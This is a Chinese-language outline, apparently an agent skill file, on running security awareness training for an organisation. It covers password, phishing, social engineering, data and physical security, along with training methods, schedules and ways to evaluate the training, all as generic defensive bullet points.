||||
|
||||
# 安全意识培训
|
||||
|
||||
## 概述
|
||||
|
||||
安全意识培训是提高组织整体安全水平的重要措施。本技能提供安全意识培训的方法、内容和最佳实践。
|
||||
|
||||
## 培训目标
|
||||
|
||||
### 1. 知识提升
|
||||
|
||||
**目标:**
|
||||
- 了解安全威胁
|
||||
- 识别安全风险
|
||||
- 掌握防护措施
|
||||
- 理解安全政策
|
||||
|
||||
### 2. 行为改变
|
||||
|
||||
**目标:**
|
||||
- 养成安全习惯
|
||||
- 遵守安全规范
|
||||
- 主动报告事件
|
||||
- 参与安全活动
|
||||
|
||||
### 3. 文化建立
|
||||
|
||||
**目标:**
|
||||
- 建立安全文化
|
||||
- 提高安全意识
|
||||
- 促进安全协作
|
||||
- 持续改进
|
||||
|
||||
## 培训内容
|
||||
|
||||
### 1. 基础安全
|
||||
|
||||
**内容:**
|
||||
- 密码安全
|
||||
- 账户安全
|
||||
- 设备安全
|
||||
- 网络安全
|
||||
|
||||
**密码安全:**
|
||||
- 使用强密码
|
||||
- 密码不重用
|
||||
- 启用多因素认证
|
||||
- 定期更换密码
|
||||
|
||||
**账户安全:**
|
||||
- 保护账户信息
|
||||
- 不共享账户
|
||||
- 及时注销账户
|
||||
- 监控账户活动
|
||||
|
||||
### 2. 邮件安全
|
||||
|
||||
**内容:**
|
||||
- 识别钓鱼邮件
|
||||
- 处理可疑邮件
|
||||
- 附件安全
|
||||
- 链接安全
|
||||
|
||||
**钓鱼邮件识别:**
|
||||
- 检查发件人
|
||||
- 检查链接
|
||||
- 检查附件
|
||||
- 检查内容
|
||||
|
||||
**处理可疑邮件:**
|
||||
- 不点击链接
|
||||
- 不打开附件
|
||||
- 报告安全团队
|
||||
- 删除邮件
|
||||
|
||||
### 3. 社交工程
|
||||
|
||||
**内容:**
|
||||
- 识别社交工程
|
||||
- 防范社交工程
|
||||
- 报告可疑行为
|
||||
|
||||
**常见手段:**
|
||||
- 假冒身份
|
||||
- 紧急情况
|
||||
- 权威要求
|
||||
- 利益诱惑
|
||||
|
||||
**防范措施:**
|
||||
- 验证身份
|
||||
- 不轻信
|
||||
- 报告可疑
|
||||
- 遵守流程
|
||||
|
||||
### 4. 数据安全
|
||||
|
||||
**内容:**
|
||||
- 数据分类
|
||||
- 数据保护
|
||||
- 数据共享
|
||||
- 数据销毁
|
||||
|
||||
**数据保护:**
|
||||
- 加密敏感数据
|
||||
- 安全存储
|
||||
- 安全传输
|
||||
- 访问控制
|
||||
|
||||
**数据共享:**
|
||||
- 最小化共享
|
||||
- 使用安全渠道
|
||||
- 验证接收方
|
||||
- 记录共享
|
||||
|
||||
### 5. 物理安全
|
||||
|
||||
**内容:**
|
||||
- 设备安全
|
||||
- 办公环境
|
||||
- 访客管理
|
||||
- 应急响应
|
||||
|
||||
**设备安全:**
|
||||
- 锁定屏幕
|
||||
- 保护设备
|
||||
- 安全存储
|
||||
- 及时报告丢失
|
||||
|
||||
## 培训方法
|
||||
|
||||
### 1. 在线培训
|
||||
|
||||
**优势:**
|
||||
- 灵活方便
|
||||
- 可重复学习
|
||||
- 成本较低
|
||||
- 易于跟踪
|
||||
|
||||
**实施:**
|
||||
- 使用LMS平台
|
||||
- 制作培训内容
|
||||
- 设置学习路径
|
||||
- 跟踪学习进度
|
||||
|
||||
### 2. 面对面培训
|
||||
|
||||
**优势:**
|
||||
- 互动性强
|
||||
- 即时反馈
|
||||
- 深度讨论
|
||||
- 建立关系
|
||||
|
||||
**实施:**
|
||||
- 定期培训
|
||||
- 分组讨论
|
||||
- 案例分析
|
||||
- 实践演练
|
||||
|
||||
### 3. 模拟演练
|
||||
|
||||
**优势:**
|
||||
- 真实场景
|
||||
- 实践操作
|
||||
- 检验效果
|
||||
- 提高能力
|
||||
|
||||
**实施:**
|
||||
- 钓鱼邮件演练
|
||||
- 社交工程演练
|
||||
- 应急响应演练
|
||||
- 安全事件演练
|
||||
|
||||
## 培训计划
|
||||
|
||||
### 新员工培训
|
||||
|
||||
**内容:**
|
||||
- 安全政策
|
||||
- 基础安全知识
|
||||
- 工具使用
|
||||
- 报告流程
|
||||
|
||||
**时间:**
|
||||
- 入职时
|
||||
- 第一周
|
||||
- 持续跟进
|
||||
|
||||
### 定期培训
|
||||
|
||||
**内容:**
|
||||
- 最新威胁
|
||||
- 安全更新
|
||||
- 案例分析
|
||||
- 最佳实践
|
||||
|
||||
**频率:**
|
||||
- 季度培训
|
||||
- 年度培训
|
||||
- 专项培训
|
||||
|
||||
### 专项培训
|
||||
|
||||
**内容:**
|
||||
- 特定角色培训
|
||||
- 深度培训
|
||||
- 认证培训
|
||||
|
||||
**对象:**
|
||||
- 管理员
|
||||
- 开发人员
|
||||
- 安全人员
|
||||
- 管理层
|
||||
|
||||
## 评估方法
|
||||
|
||||
### 1. 知识测试
|
||||
|
||||
**方法:**
|
||||
- 在线测试
|
||||
- 问卷调查
|
||||
- 技能评估
|
||||
|
||||
**指标:**
|
||||
- 测试分数
|
||||
- 通过率
|
||||
- 改进情况
|
||||
|
||||
### 2. 行为观察
|
||||
|
||||
**方法:**
|
||||
- 模拟演练
|
||||
- 实际观察
|
||||
- 事件分析
|
||||
|
||||
**指标:**
|
||||
- 演练结果
|
||||
- 事件数量
|
||||
- 报告数量
|
||||
|
||||
### 3. 反馈收集
|
||||
|
||||
**方法:**
|
||||
- 培训反馈
|
||||
- 满意度调查
|
||||
- 建议收集
|
||||
|
||||
**指标:**
|
||||
- 满意度
|
||||
- 改进建议
|
||||
- 培训效果
|
||||
|
||||
## 最佳实践
|
||||
|
||||
### 1. 内容设计
|
||||
|
||||
- 针对性强
|
||||
- 实用易懂
|
||||
- 案例丰富
|
||||
- 持续更新
|
||||
|
||||
### 2. 实施策略
|
||||
|
||||
- 定期培训
|
||||
- 多种形式
|
||||
- 互动参与
|
||||
- 跟踪效果
|
||||
|
||||
### 3. 文化建设
|
||||
|
||||
- 领导支持
|
||||
- 全员参与
|
||||
- 持续改进
|
||||
- 奖励机制
|
||||
|
||||
## 注意事项
|
||||
|
||||
- 内容要实用
|
||||
- 形式要多样
|
||||
- 跟踪要持续
|
||||
- 改进要及时
|
||||